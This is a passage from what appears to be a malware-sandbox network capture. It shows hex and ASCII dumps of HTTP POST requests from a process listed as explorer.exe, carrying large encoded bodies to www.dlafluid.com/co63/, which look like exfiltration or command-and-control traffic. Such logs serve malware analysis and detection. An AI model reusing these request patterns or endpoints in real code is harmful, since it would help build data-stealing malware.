4a 47 70 62 4d 4f 38 63 51 6a 57 77 32 4f 51 6a 37 63 75 39 52 55 71 6b 41 34 51 4f 43 62 65 4b 6e 62 45 36 61 76 5a 65 79 66 55 66 54 6d 4e 67 63 44 6a 69 6e 33 2d 32 30 58 69 70 66 7e 78 62 43 51 54 6b 63 6a 5a 58 46 55 67 78 56 28 31 76 67 6b 69 58 51 31 50 66 6a 7a 34 77 62 63 52 71 56 70 4b 6d 62 61 38 59 7a 62 4c 47 44 54 6d 52 32 31 39 68 68 35 34 70 4e 57 39 28 4b 4b 78 4d 62 44 66 4c 56 70 68 70 61 6c 73 4c 4d 43 37 58 64 54 5a 79 69 51 67 69 72 66 56 69 6f 74 6a 6c 57 38 2d 54 33 30 38 57 69 45 6b 72 36 6a 34 52 59 72 49 35 57 75 6a 62 49 54 30 45 57 38 42 4f 45 44 48 4d 7a 43 70 79 4f 31 7a 58 64 51 39 4b 61 72 62 4a 74 5a 4c 78 65 37 31 37 46 56 70 70 64 49 71 57 4e 71 43 6a 38 48 67 6a 69 66 43 50 6b 47 37 69 33 53 34 52 6d 52 37 75 68 5a 51 50 55 69 4b 59 68 52 33 77 32 6e 4d 76 55 6d 45 4b 74 73 56 48 35 4d 64 7a 69 51 2d 6a 75 52 37 7e 72 6e 77 6c 55 6a 4a 74 5a 71 6b 45 39 51 43 68 66 58 59 47 31 51 56 46 56 57 5a 51 47 4d 67 67 51 7a 46 58 33 77 71 48 30 44 56 69 33 41 2d 59 46 39 2d 64 59 37 4c 51 2d 61 64 28 54 61 4e 38 55 62 63 7a 35 41 57 55 51 30 65 53 46 4f 66 38 4e 53 78 33 43 6a 47 67 36 35 71 46 67 46 6e 7e 2d 6b 38 56 61 4c 6e 36 6f 72 46 67 46 55 50 6b 46 65 51 44 6c 56 55 69 47 32 67 4d 47 44 44 49 6e 28 38 35 57 67 31 48 57 6b 72 6b 30 75 4b 53 36 61 53 67 6e 75 67 77 6d 42 34 6e 6c 6c 6b 7e 55 49 52 54 6d 72 42 68 57 56 4d 45 55 68 52 58 56 4b 38 70 44 31 70 37 50 74 4e 68 43 53 6c 73 5a 6a 7a 32 79 70 69 74 71 4f 78 4e 37 36 30 6c 38 51 51 6b 39 31 70 53 2d 64 52 50 36 51 2d 44 38 6d 46 34 53 38 68 6f 48 6b 53 72 42 76 61 73 4a 63 31 4e 66 63 36 6b 31 57 7a 52 71 45 72 56 45 4e 4f 39 71 7e 51 38 46 70 4f 32 66 55 5a 64 54 77 58 74 50 59 71 7e 67 62 56 6e 74 68 68 54 63 59 34 58 38 6e 2d 48 70 56 73 6a 6f 66 63 31 31 45 6a 58 63 62 70 53 2d 34 5a 33 55 4a 4b 4a 4a 4c 51 48 7a 4e 72 6e 6f 50 48 37 5f 6a 48 71 74 49 41 31 58 58 5f 62 52 4c 38 7e 42 43 78 73 4a 6b 6a 46 47 6d 43 4d 66 78 30 52 79 64 68 57 7a 28 4f 38 5f 4b 48 35 56 6a 72 4c 5f 79 51 76 56 71 4b 76 77 79 49 61 70 6b 47 73 39 46 30 62 51 57 72 65 30 73 58 38 72 6c 63 30 59 58 6a 59 75 39 6e 65 44 4d 71 6d 4f 59 4b 53 57 71 51 63 30 71 6a 4a 66 54 71 7a 49 58 53 33 6f 37 79 32 77 53 33 52 78 43 73 67 30 4c 54 55 77 61 74 69 63 59 56 38 44 55 75 58 51 67 44 75 4f 31 65 49 6e 57 45 64 52 59 49 6a 41 37 70 42 79 6f 41 38 6d 56 57 77 30 54 62 30 6c 6d 51 46 38 62 4c 55 63 43 37 55 4e 6b 79 35 41 75 57 7a 62 68 53 61 46 54 43 66 71 7e 56 51 71 52 69 6f 32 51 6d 48 6d 71 66 59 62 41 74 62 32 69 5f 37 37 66 75 46 4c 6a 72 4a 4b 35 32 34 59 4b 58 59 53 37 64 46 78 64 37 45 61 36 34 51 34 77 4b 75 63 43 62 50 75 62 72 39 67 50 62 38 6d 70 4e 78 43 71 2d 38 7a 75 48 5a 52 75 48 36 43 35 30 4c 6a 63 6e 79 33 35 36 71 65 36 63 34 36 65 71 5a 59 51 4e 67 4f 37 39 38 51 53 51 69 4c 7a 6d 41 6b 66 32 76 68 51 48 47 69 4e 6c 55 57 4b 73 5a 33
                                                      Data Ascii: aJElwV=ze0CwpKhrCnILfm0kBWWoFKG8jVZWKWrzo6ruyuT72SAIBPPBdytyKt-UFylHYwdDHv3TuREOMimCD6TORxV9zwav7rD361BVSQPgsJcYJwI8TCAaGpDTkmB8d4XchuHOkcYKaHdent2tZ4zUTkM3lG7VD37hi(RAGloC5bQbfIVqGDddkiDMlHZZJXBqK9d6kUJ9ayOLHz7pyunq0Jv69c7F0u7(HdkUJek1N0GhPZ0EHMhfW(kO3Fa~x4_2u9NTWRs7ReOKLKmW_A_8D0GGadFngTbp_hD(IUFDOsYiEYynuT_2q4uXmEhFPWOFpz86RGt1zKDbDKyIBcQO5GwlcvKkcaeOqODS7lU7ZY0Dib7say3tko5GZNYQzTCw5pjP_exAutAWk7WnHpJGpbMO8cQjWw2OQj7cu9RUqkA4QOCbeKnbE6avZeyfUfTmNgcDjin3-20Xipf~xbCQTkcjZXFUgxV(1vgkiXQ1Pfjz4wbcRqVpKmba8YzbLGDTmR219hh54pNW9(KKxMbDfLVphpalsLMC7XdTZyiQgirfViotjlW8-T308WiEkr6j4RYrI5WujbIT0EW8BOEDHMzCpyO1zXdQ9KarbJtZLxe717FVppdIqWNqCj8HgjifCPkG7i3S4RmR7uhZQPUiKYhR3w2nMvUmEKtsVH5MdziQ-juR7~rnwlUjJtZqkE9QChfXYG1QVFVWZQGMggQzFX3wqH0DVi3A-YF9-dY7LQ-ad(TaN8Ubcz5AWUQ0eSFOf8NSx3CjGg65qFgFn~-k8VaLn6orFgFUPkFeQDlVUiG2gMGDDIn(85Wg1HWkrk0uKS6aSgnugwmB4nllk~UIRTmrBhWVMEUhRXVK8pD1p7PtNhCSlsZjz2ypitqOxN760l8QQk91pS-dRP6Q-D8mF4S8hoHkSrBvasJc1Nfc6k1WzRqErVENO9q~Q8FpO2fUZdTwXtPYq~gbVnthhTcY4X8n-HpVsjofc11EjXcbpS-4Z3UJKJJLQHzNrnoPH7_jHqtIA1XX_bRL8~BCxsJkjFGmCMfx0RydhWz(O8_KH5VjrL_yQvVqKvwyIapkGs9F0bQWre0sX8rlc0YXjYu9neDMqmOYKSWqQc0qjJfTqzIXS3o7y2wS3RxCsg0LTUwaticYV8DUuXQgDuO1eInWEdRYIjA7pByoA8mVWw0Tb0lmQF8bLUcC7UNky5AuWzbhSaFTCfq~VQqRio2QmHmqfYbAtb2i_77fuFLjrJK524YKXYS7dFxd7Ea64Q4wKucCbPubr9gPb8mpNxCq-8zuHZRuH6C50Ljcny356qe6c46eqZYQNgO798QSQiLzmAkf2vhQHGiNlUWKsZ3oaiasdvTKhiFGmVBPtrnDONFiITaZ_2_4fqocoflHPuRRg8bVv6SpruBGq2ElRsc1oIB(q3QmGI7QEi3H7iLb28YBZjntOqbD0Q6irhQQBkGTB~bOf5cuQ).ZbQJR0f
                                                      Jul 20, 2023 11:45:36.473906040 CEST641INHTTP/1.1 405 Method Not Allowed
                                                      Server: openresty
                                                      Date: Thu, 20 Jul 2023 09:45:36 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 154
                                                      X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_R/ex/bZytcrn+mdS8YhV4IEoSKT9oNHNKUPqIjguyZiSsiUtRdiujE/fk+SgLzGG0HDyRB3Uyq6OtQGUGIBFfQ
                                                      Via: 1.1 google
                                                      Connection: close
                                                      Jul 20, 2023 11:45:36.474831104 CEST641INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41
                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      11192.168.2.54972234.102.136.18080C:\Windows\explorer.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Jul 20, 2023 11:45:36.367321968 CEST498OUTPOST /co63/ HTTP/1.1
                                                      Host: www.dlafluid.com
                                                      Connection: close
                                                      Content-Length: 151296
                                                      Cache-Control: no-cache
                                                      Origin: http://www.dlafluid.com
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Accept: */*
                                                      Referer: http://www.dlafluid.com/co63/
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate
                                                      Data Raw: 61 4a 45 6c 77 56 3d 7a 65 30 43 77 74 58 51 34 45 36 54 61 70 32 70 6b 33 61 65 6d 46 37 66 75 44 35 49 4b 71 66 4d 74 4b 44 4b 75 7a 7e 58 75 6a 4f 65 43 43 58 50 55 4f 61 71 30 71 74 35 44 56 79 6b 44 5a 4e 69 4b 31 7e 37 54 76 56 2d 4f 4d 61 68 55 78 53 63 49 7a 70 5a 28 6a 38 49 67 62 76 61 7a 2d 64 43 55 33 34 54 72 4f 70 63 47 71 73 77 77 67 71 4c 58 58 56 58 63 6b 36 44 6b 74 52 5a 4b 42 50 68 50 48 77 55 4e 62 6e 31 61 6a 6f 36 70 39 55 62 62 51 45 49 71 6c 53 38 42 51 4c 35 67 46 75 67 42 48 6c 77 4f 5a 6a 39 56 39 55 62 75 56 6e 72 64 6c 57 32 57 56 32 76 57 76 79 6b 71 34 55 6f 74 31 51 4a 28 4b 4b 65 54 51 50 39 30 46 69 5f 6e 48 78 65 71 4e 4d 57 56 52 71 38 78 32 39 6a 59 76 69 4f 36 4d 78 34 6a 4f 67 6d 4f 31 55 5a 66 32 71 70 53 58 30 38 33 53 6f 51 76 64 49 4d 48 79 39 6b 32 55 75 31 49 38 4c 6e 5a 4e 35 49 77 41 34 4f 48 72 74 76 78 33 50 59 6e 4d 35 45 76 62 38 56 4f 4f 77 4a 6b 45 51 75 73 50 54 74 32 71 73 31 58 45 5a 59 47 50 58 46 61 37 58 31 36 56 53 74 31 79 36 54 61 33 57 79 4a 69 46 4b 65 50 53 5f 68 73 75 4b 6d 4d 4b 4a 59 4a 61 59 53 37 56 41 37 71 34 30 43 6d 33 37 70 35 4b 32 72 6b 6f 35 49 35 4e 65 51 7a 54 4b 77 35 70 4b 50 35 71 6c 42 75 56 41 65 45 48 59 68 6b 67 47 58 50 71 33 4b 63 63 63 6b 55 4a 6a 63 67 47 31 63 74 4e 4a 54 4a 67 41 35 55 32 4e 4c 72 6d 37 4b 6c 36 46 68 34 48 74 57 30 6e 44 6d 4e 64 51 41 69 7a 4d 39 50 37 79 57 69 70 63 78 6c 36 47 47 6e 35 46 71 6f 6e 6f 66 42 35 2d 77 68 4f 31 6b 43 43 51 73 6f 37 52 79 35 74 42 61 52 7e 72 34 6f 4b 58 62 75 78 5a 66 4c 69 62 65 33 4e 4e 30 63 41 63 74 71 64 62 66 66 28 36 4b 43 45 37 41 2d 66 42 31 77 46 6c 39 5f 50 65 58 4c 48 79 57 72 53 44 66 52 47 5f 55 33 71 38 69 6a 68 46 31 74 6e 72 77 63 7e 7a 65 43 4b 38 31 4a 41 5f 71 34 52 56 31 6a 33 64 53 30 34 5a 71 77 6a 32 43 7a 6c 35 56 62 4b 41 34 7a 61 6a 53 39 44 4e 69 62 59 47 64 72 4e 5f 28 6d 66 6b 4e 37 59 65 55 71 36 75 75 77 72 5a 41 43 48 62 58 44 58 41 4f 2d 65 74 66 37 74 56 57 70 76 42 53 46 37 6d 76 62 6f 61 43 67 6c 43 30 73 7a 68 72 68 50 5f 68 58 57 46 64 50 62 48 58 63 66 66 66 50 48 32 39 51 59 42 6a 71 56 33 36 51 30 68 5a 44 46 51 59 62 4b 6b 45 47 56 69 54 2d 5a 30 4e 54 4e 31 38 58 4c 4d 31 5a 57 63 4f 68 7e 76 42 4f 6f 73 39 2d 56 63 37 61 77 75 64 6f 76 54 65 4d 38 58 62 39 79 79 51 57 55 51 6f 65 53 64 44 5f 77 38 53 30 58 43 67 43 73 36 77 2d 68 69 46 6e 28 5f 74 64 68 75 4d 58 37 6f 73 45 73 38 55 4f 45 58 65 54 76 35 53 55 75 34 79 6a 4d 4a 53 44 49 37 73 35 5a 52 67 30 36 31 6b 72 35 70 6b 71 44 69 61 6a 5a 41 67 77 77 6d 49 65 7e 75 68 56 75 52 4e 57 54 69 33 78 42 77 63 4d 49 38 6b 6b 6a 43 43 5a 64 42 34 2d 44 50 71 34 52 57 65 6c 49 4a 77 77 47 74 70 43 64 33 52 45 68 77 30 42 56 74 57 78 41 39 7e 5a 7e 58 53 79 58 78 66 75 44 4b 6b 53 45 30 77 42 45 2d 6e 56 6e 43 76 49 6f 53 65 31 4e 32 64 62 41 62 66 52 74 34 4d 64 45 54 4c 36 39 49 7e 79 63 45 6f 36 69 71 52 37 6f 38 32 6c 6f 50 54 4c 6e 70 4f 78 47 74 75 42 4f 6c 63 75 65 78 71 38 47 50 64 73 33 4e 58 2d 56 50 65 45 75 39 5a 62 6d 4c 36 35 62 70 45 76 56 66 49 54 43 58 55 4a 6d 47 63 30 58 4d 6d 6d 28 72 41 51 46 42 4f 5a 28 79 59 65 7e 61 41 67 6c 73 34 51 4a 71 69 41 64 30 68 30 55 4d 51 41 79 66 79 65 45 63 49 30 4a 6b 77 73 53 46 7a 67 57 41 67 64 75 63 6a 5f 32 4e 39 6c 42 76 49 77 50 56 4a 70 62 61 6b 45 41 6d 6b 34 6f 35 51 47 68 58 32 45 44 6c 5a 74 71 39 59 59 53 4f 75 53 34 75 71 6d 6b 57 53 4b 72 49 44 44 48 6f 36 56 57 77 62 6e 56 79 49 35 45 4e 65 45 34 50 43 50 57 59 50 6b 41 48 47 74 43 47 78 54 72 54 30 35 42 6a 5a 33 39 75 52 2d 6e 53 35 34 68 76 76 7a 51 68 64 78 38 48 56 4c 49 5f 6c 48 39 61 61 59 45 39 4c 64 4a 54 79 42 55 49 6e 30 58 68 37 69 7e 77 62 56 33 78 67 53 42 46 53 69 6c 32 61 58 7a 62 69 36 70 6b 64 62 66 53 69 6f 57 79 58 73 39 53 70 72 4a 61 7e 45 6f 66 4e 57 67 50 78 49 68 62 5a 4c 38 63 6e 35 52 41 33 63 4b 54 43 66 61 61 57 59 4e 41 4e 2d 52 61 30 38 78 67 35 36 49 51 70 48 77 73 37 69 6d 2d 6d 48 72 78 58 57 76 48 32 4a 36 48 33 65 45 67 49 66 64 69 63 4d 34 58 79 2d 30 37 58 79 6e 72 28 6d 78 6c 63 30 44 39 56 31 32 7a 49 6d 70 50 4a 76 64 76
                                                      Data Ascii: aJElwV=ze0CwtXQ4E6Tap2pk3aemF7fuD5IKqfMtKDKuz~XujOeCCXPUOaq0qt5DVykDZNiK1~7TvV-OMahUxScIzpZ(j8Igbvaz-dCU34TrOpcGqswwgqLXXVXck6DktRZKBPhPHwUNbn1ajo6p9UbbQEIqlS8BQL5gFugBHlwOZj9V9UbuVnrdlW2WV2vWvykq4Uot1QJ(KKeTQP90Fi_nHxeqNMWVRq8x29jYviO6Mx4jOgmO1UZf2qpSX083SoQvdIMHy9k2Uu1I8LnZN5IwA4OHrtvx3PYnM5Evb8VOOwJkEQusPTt2qs1XEZYGPXFa7X16VSt1y6Ta3WyJiFKePS_hsuKmMKJYJaYS7VA7q40Cm37p5K2rko5I5NeQzTKw5pKP5qlBuVAeEHYhkgGXPq3KccckUJjcgG1ctNJTJgA5U2NLrm7Kl6Fh4HtW0nDmNdQAizM9P7yWipcxl6GGn5FqonofB5-whO1kCCQso7Ry5tBaR~r4oKXbuxZfLibe3NN0cActqdbff(6KCE7A-fB1wFl9_PeXLHyWrSDfRG_U3q8ijhF1tnrwc~zeCK81JA_q4RV1j3dS04Zqwj2Czl5VbKA4zajS9DNibYGdrN_(mfkN7YeUq6uuwrZACHbXDXAO-etf7tVWpvBSF7mvboaCglC0szhrhP_hXWFdPbHXcfffPH29QYBjqV36Q0hZDFQYbKkEGViT-Z0NTN18XLM1ZWcOh~vBOos9-Vc7awudovTeM8Xb9yyQWUQoeSdD_w8S0XCgCs6w-hiFn(_tdhuMX7osEs8UOEXeTv5SUu4yjMJSDI7s5ZRg061kr5pkqDiajZAgwwmIe~uhVuRNWTi3xBwcMI8kkjCCZdB4-DPq4RWelIJwwGtpCd3REhw0BVtWxA9~Z~XSyXxfuDKkSE0wBE-nVnCvIoSe1N2dbAbfRt4MdETL69I~ycEo6iqR7o82loPTLnpOxGtuBOlcuexq8GPds3NX-VPeEu9ZbmL65bpEvVfITCXUJmGc0XMmm(rAQFBOZ(yYe~aAgls4QJqiAd0h0UMQAyfyeEcI0JkwsSFzgWAgducj_2N9lBvIwPVJpbakEAmk4o5QGhX2EDlZtq9YYSOuS4uqmkWSKrIDDHo6VWwbnVyI5ENeE4PCPWYPkAHGtCGxTrT05BjZ39uR-nS54hvvzQhdx8HVLI_lH9aaYE9LdJTyBUIn0Xh7i~wbV3xgSBFSil2aXzbi6pkdbfSioWyXs9SprJa~EofNWgPxIhbZL8cn5RA3cKTCfaaWYNAN-Ra08xg56IQpHws7im-mHrxXWvH2J6H3eEgIfdicM4Xy-07Xynr(mxlc0D9V12zImpPJvdvrYmO3JbMPi6nJHx6TtTnXpRGn53qPMOF(_6oCIy7H-OUHQk8d7qBsuqZMKG5jzM34IJrxOzAjS59YRbFLfuUOVguBY7g9J7QF1xC69t-VAV5O1L3CNkbyEEjEpf3zumLC8BvVGscpJWjG1wwe-OnlBKccasISD3z8YaAQQM-JAJvgyKcf7X4BABLSHSuRvWwRkdB1QInhmFRK8ziT4fEw5XSEgoN7kFhIKVYuN09TQ84AfphEcl-9f7CONWsPA3sxzlJfaV-HUyxn1gVglL7e0af5cqv9EXcPciCaQCDsZMdPjjyWczO5J3LysRPNZ~_86tCMsyfO5yaUreCnlkV9CwKCrrELF5BNOtWDLWqsPQXdesyPzBY4rpUdbU7TbE4EhiNvZy17IqGm0eZw0dUtrOF4O8fvumqU-oHd0~dA2y8123hE-Tuyeq_8UHLMVwaDHobjE8-opvbkJUipEwW53mCYRztz0sCyIFDoA0TOR4_FXQXWPPsbJxgavOqaYAyWIcSOY4AWumGWwGgSAw_Oaj_V0L3frq9d76_YuaTdR09FRk9G_XscSQ33KDnV1w1o3Y3E69v5mLvZqpicc4GRKfibLS7tJWNAXRyPqk8t7bBdUeMxbDcp2LkALvShQGD7-boz6KExXMhbsdriEWRj3FeJ9tlRlEKiuK8jTvS1QBucyMJR0GBJ4TLNhkRdiylZD45G6N9R85ETJPxM-IwJ8vH2FElCyucQh6VGbAhGpFfcy9InUhiYd7YO7mqBst5PJuxNkb1T-CV8QJSypy9dlRqpWAZ0uW55_S2PA(Z0yA2NA43CCRp8nv78MPvFEmt5zletg91KWgE0IuVjoxhwEN1fTP-mubGJm~1gE60jcXA028H1b~St8BtWTrXbMDgyEdxxSfLrcGoYQRT4Rf_UhiGC_FTJMwcVeXwHejWFZwYUfRgIyqNhCLLjC8mxOzWf-zwFsDDGd9htKQA5exLdSgR1dfFz6tSvVOKGlm6O0htO4RUDVfGS4FXI7Z6ytOU26FtRlI0X-irOwNm6jxPOKzHJWNRfgZM8uBRcxpgg7(7l-Fumtz8zKe_Vt1KwFU5262polG36XQTS30N6dxMogv-UQjnKmHMYE045IjHYcufvAzDPWAfpCU-Q0LQ4rV4NTJVWl30QPkM5kkCqCGJ8xrMGw5Ap7WD1LUBats4XxC8DFKCdGViFZfvvf64u75Y2BHd8-rB1RroQ_jOKi6ShPPJbI9smUFgLjiHJRslPnnFyqA1KW~BWhMxo7FAvkJ27843U-7HhQBRi-6fy8me8Ln1H4kzqqW9iUfUEhLIGNl9xFacZ1G8iGCMSTzsxpqiNIX-MEaiQSk5oVHlq4ROnhNPRkKJwetwKkghlfS2Fr(zsLAnRMIeD9Bd(BE0uza5mLwe20KTEqH5lT1w617GpFO7t-ZcqKaZldFrVw1CGWdezNzvpmfsi3Gnf2d_2Z0ESToiUT(pcty0RdBbRu0WTKoabgnHH4D0yXYqNphtVWpkEULfPMQwIaag8ORvuBdQv3mOG1HbqVM3K3PwTOQiWa7bYPl8dqdmBlJADn~5DBo-fNmK2x7MOeKrkt30UpCWLu~YhACE4oTM0c9m9f0WJIsk7m1sNJSdF4HYfJZMaP8Ht4we5Wr2(4uxqQKgkR78PPS_NSMZ9ycVFRxtRYLw5qt8bQAquEqrpSzFMnl4udTShntin1(IqJaYIhpiQLVWOjIRe_YWGQoKb-Oq(WPtRTCX2oNWIvKGy0TMJP1HPx06i71-7-Bx3sSdYSJ8AwDvP8TP9tgozfs6frxxLpOjnwEfcfmkWYM2kROVE_~ZI2pZvi5fXjpEjry1StxzT76s9k2gmFRJW2oNRqM0UrBTq5OGpmCvZbpJOSREy7icdFN6dLM1bVnlx0MN9o3Ewq7xZpgY871uMZH91zFFvsc6WW7WYCNtviV7q-Rga7Z9bFkcLz~yXdnIjOkQvQ63L0dUARM59pD_7vAKudWuUCSnYfhMMk2avwkoKuuQ7FV5ptYUPhsdt26RrF5BoUzUDo69W-I1AAR7l52WeuIDw2KWtolLpO8AToQxeX6h(6L9evtlDJ66CrjmOQyDUReIZ3cC8og5B4jWmlBkPffESWrJ3Vqxhj9hdy5FxWv4jN9hMI9r(J0RBnt2r6N1kF73J-xCYB3U64yye5R0OrcEbnpnRnmdFrXatrEITJokLG2yfNAHKGG83zIUOZydorIYbI18GhM7XZjL2Wl990FKW4ziOYcgMJV1WPHxYOgCzvTlt5E_l_7XdcYOnwSGW2QJt_DHtqCUdwL5AVLEyhRydOWS2EN-TUx5(yH3bR2-o1R7VDTwL7~_6S9hMPye3VUOgpIk1TOSigrOaXiUgoOEt_IcKjbHCg1iLycKI_7wXUO8I9nLXCduK2tshb8_3tS6WfvynAxTeo3Wnzs135HdKcDkzAq0~KnRVQ1aNGpEoqH_Uph7pkqgziXUSIcfe_rO9Mqhui(PE62MRDQ5Gk9eWYC6gEDQadBkI2ZhlVHB8qaV69sqk-38dBBysjzT5O63p4aXmDg4iTCyb2g0UgyatDJG2MnqfBEaf5Kywz(O~8BLkKtlpwh8jTlKc-(slprHXBOP~kxUMni8CDg9MWWklWMehLYAK6aMVBcZ~m0Fy70ZOHfh3gtfpqUAeLuUZ3Uv6fijYFTehSRlfbpE4XiWHIVZ5M2JVCATfItIcFm
                                                      Jul 20, 2023 11:45:36.382474899 CEST506OUTData Raw: 4e 41 5a 41 43 50 79 34 61 4e 4b 39 6b 41 6d 71 37 31 6b 53 49 4c 54 56 55 66 6b 4f 45 6d 69 7a 65 73 35 79 7e 52 35 62 67 6d 42 4e 6a 4e 42 76 6c 6c 67 72 37 6e 6f 4b 58 34 6c 4b 47 73 67 75 6e 34 33 33 69 51 72 35 6f 61 34 7a 74 6e 37 61 46 49
                                                      Data Ascii: NAZACPy4aNK9kAmq71kSILTVUfkOEmizes5y~R5bgmBNjNBvllgr7noKX4lKGsgun433iQr5oa4ztn7aFIbSDW49(Xxz1nHXQanSuRnVYXdwTrX7R2uZnqsUiRqb2b9qgMJpKVzZcXb3eQDZOHsvDURXt4tjOSdUQOO9Z2JUGWKYg1o0(WVdMc4DGQXDRctlJFi3HNIyryi-GN3S~beBrTEGCxyL9B7LDoHYYU3F5z6ALv~8i2t
                                                      Jul 20, 2023 11:45:36.382544041 CEST516OUTData Raw: 74 76 66 56 56 67 61 4a 66 34 41 6e 4f 46 38 35 37 31 33 49 66 48 32 75 69 55 51 4b 47 37 72 77 7a 4d 47 64 46 41 55 33 52 5f 69 7a 6d 6d 48 34 31 74 6b 72 38 67 73 70 32 4d 4e 6a 4a 53 74 30 52 35 31 4f 75 74 47 65 58 45 6b 56 47 77 31 66 6b 73
                                                      Data Ascii: tvfVVgaJf4AnOF85713IfH2uiUQKG7rwzMGdFAU3R_izmmH41tkr8gsp2MNjJSt0R51OutGeXEkVGw1fks(ApBJ8gOXK6bmJVPnapT53uf(zb3BqinFkwjglmtvot_fleSdwRBoMADNaXW69839tR93Tj4f6v0z-nUymVekjhIa-tOG6h_Ga2yeAU0W9w6MX4kIjuii0uhMwJDL3(C(1dCbfOe9oZtRCegFAUi4du0djRutgDIE
                                                      Jul 20, 2023 11:45:36.391192913 CEST524OUTData Raw: 56 79 69 79 64 56 6c 47 62 2d 56 4f 47 48 31 6a 68 34 7a 47 55 59 69 39 78 55 73 6b 78 74 71 36 44 70 4b 4b 30 62 75 42 44 32 69 39 58 79 30 68 34 58 74 4c 4b 6e 32 73 73 57 48 6a 77 70 31 51 70 4a 67 5f 6f 47 31 6a 36 48 75 37 73 6a 49 54 32 30
                                                      Data Ascii: VyiydVlGb-VOGH1jh4zGUYi9xUskxtq6DpKK0buBD2i9Xy0h4XtLKn2ssWHjwp1QpJg_oG1j6Hu7sjIT20X4rxJ_1YIeoBlDrEgDijpCMSXDo6cCNWPQN-K8Z8E6l_TLrfJ-(qx5TfAIXxVfGrbUJo7VQlTGBlS3Lp~hWrC0Lky9dhjFc2~mDSfvoAWcTlHhkGTCfAdlsWKoPOBoEOHIDIt7jhAIZf8Vb4Wkjmega22c51uiMww
                                                      Jul 20, 2023 11:45:36.406075954 CEST532OUTData Raw: 77 6f 31 64 74 57 47 57 4f 58 53 45 47 47 55 32 48 32 57 53 69 62 54 30 30 5f 48 33 28 41 67 36 48 36 72 62 48 42 6c 33 4d 57 78 4b 6f 53 57 4c 6a 65 46 42 7a 32 7e 76 70 53 30 38 48 6b 71 37 54 51 48 39 68 4f 6a 73 57 32 75 32 4f 71 48 6b 32 4f
                                                      Data Ascii: wo1dtWGWOXSEGGU2H2WSibT00_H3(Ag6H6rbHBl3MWxKoSWLjeFBz2~vpS08Hkq7TQH9hOjsW2u2OqHk2Ou85tCeO6HqzQqOYlxQRI27Q7pqjSOLZeTduw~xS8(QjM0HJ0wkfiZpxQDb1C051kmQV_GtV9grSUAlCQYHoEd0a9QRANFU9vyDDsQfoXj5jK~Qr_46qfKA0BQCkW3lT2GQhQSANbpM8SEFXpX9sM5W(qFyVQBygsh
                                                      Jul 20, 2023 11:45:36.406075954 CEST542OUTData Raw: 43 76 31 34 78 53 4d 47 51 68 54 5a 69 62 54 4c 37 4d 4c 68 51 42 28 2d 66 63 50 78 55 73 4f 58 77 58 37 6a 6e 48 32 6f 70 4d 68 75 54 61 66 74 4d 4e 30 4d 76 35 67 4b 37 31 79 57 33 76 6e 57 6c 71 74 6f 44 48 34 42 58 6e 4a 71 4e 4a 68 48 56 43
                                                      Data Ascii: Cv14xSMGQhTZibTL7MLhQB(-fcPxUsOXwX7jnH2opMhuTaftMN0Mv5gK71yW3vnWlqtoDH4BXnJqNJhHVCCQM1MEW3HuwO4nF0ZMLbtbYb9bAFmZNKwnncb-oKcXPPM2H2M4Cuz0uu4-DPQ3CNiJZfQ1MbNXskaurqLQU1otLS2aGa468zRnXaZsFzCV0_7J4gTBpADQWd0NeGGo(2WMA9hg(UcH~BLGGQVczvo59PmlB5o1BUm
                                                      Jul 20, 2023 11:45:36.406131983 CEST547OUTData Raw: 6a 51 37 44 48 4b 76 76 46 4b 34 59 37 74 6b 37 39 44 74 65 66 46 6c 46 28 79 7a 38 34 5f 45 47 66 5f 71 6b 28 63 48 55 44 62 54 6b 53 52 30 6d 38 39 70 49 76 5a 4f 57 63 4a 75 50 47 45 65 59 73 53 6d 69 37 76 6c 47 72 45 50 30 64 41 69 57 35 35
                                                      Data Ascii: jQ7DHKvvFK4Y7tk79DtefFlF(yz84_EGf_qk(cHUDbTkSR0m89pIvZOWcJuPGEeYsSmi7vlGrEP0dAiW55gbgUswCt7DXJ~Lfp207FVWCOtuLVXK9iSaPS5vpxmrSO8bT6zHe9p-ynAVeTkmtGe1OtsxRIFYRePt0yTz9CBFW9zuQN957oTthL~AkHsKc_88LGrjwTARty~p8RjsSRoEyF3DoowlRkyzPwc-kGdrpQ52b1JJ(rx
                                                      Jul 20, 2023 11:45:36.406168938 CEST557OUTData Raw: 6e 48 68 35 34 71 45 5f 56 2d 62 6d 53 6e 70 78 38 68 31 48 43 6d 48 70 30 32 43 2d 38 68 48 6a 37 46 62 56 35 6c 49 79 37 73 51 67 56 4a 34 2d 55 5f 6c 62 76 34 43 4e 43 57 6c 76 4b 72 6e 4f 35 45 30 2d 51 6a 4a 34 4b 5f 71 64 33 4a 43 6a 34 4d
                                                      Data Ascii: nHh54qE_V-bmSnpx8h1HCmHp02C-8hHj7FbV5lIy7sQgVJ4-U_lbv4CNCWlvKrnO5E0-QjJ4K_qd3JCj4Ma_ysuBXtZHOfwz3qPl0S4Bn_vwehhfc8tIdptbnKtAuzBO7Q(cMOOtud3LBneSo0vSevChk74mD0Rh5w0S8XflJ45j4F(esz(DbbzFvV8Bit1fvfsSM1pEWpP3ivaTk9fLB0NHGyV688ZLK4ntjqO5If1pCyWSAbc
